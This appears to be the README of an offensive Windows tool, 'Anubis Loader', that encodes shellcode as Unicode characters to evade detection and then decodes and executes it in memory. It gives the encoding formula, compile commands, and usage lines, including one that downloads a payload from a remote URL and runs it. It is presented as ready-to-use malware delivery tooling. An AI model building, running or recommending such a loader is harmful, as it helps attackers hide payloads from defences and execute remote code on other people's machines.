Anubis Loader is a Unicode‑based shellcode obfuscation and loading framework.
It includes both a Python obfuscator and Windows-native loaders capable of decoding and executing Unicode‑encoded payloads from local files or HTTP sources.
-
Unicode Shellcode Obfuscation
Encodes raw shellcode bytes into high‑range Unicode characters for stealthy transport. -
Local & Remote Loading
Supports execution from local UTF‑8 encoded files or direct HTTP download. -
In‑Memory Execution
Allocates RWX memory, decodes bytes, and executes the payload without touching disk. -
Surrogate-Pair Handling
Proper decoding of multi‑byte UTF‑8 sequences and Unicode surrogate pairs.
obfuscate.py converts binary shellcode into a sequence of characters starting at Unicode base 0x13000.
Reads a UTF‑8 file, decodes the Unicode sequence, converts it back to bytes, and executes it from memory.
Uses WinINet to fetch obfuscated Unicode data from a remote server, decode it, and execute in memory.
cl stageloader.c /link wininet.lib -o anubis_stage_loader.exe
# for cross compile from linux
x86_64-w64-mingw32-gcc stageloader.c -o anubis_stage_loader.exe -lwininet python obfuscate.py input.bin -o output.txtAnubis_loader.exe output.txt
Anubis_http_loader.exe https://example.com/payload.txtEncoding
- Each shellcode byte is transformed into a Unicode code point:
encoded = 0x13000 + byte_value-
Transport Encoded content is distributed as UTF‑8 text.
-
Decoding The loader reads each Unicode code point and subtracts the base offset to recover the original byte.
-
Execution Memory is allocated via VirtualAlloc, permissions updated via VirtualProtect, then executed.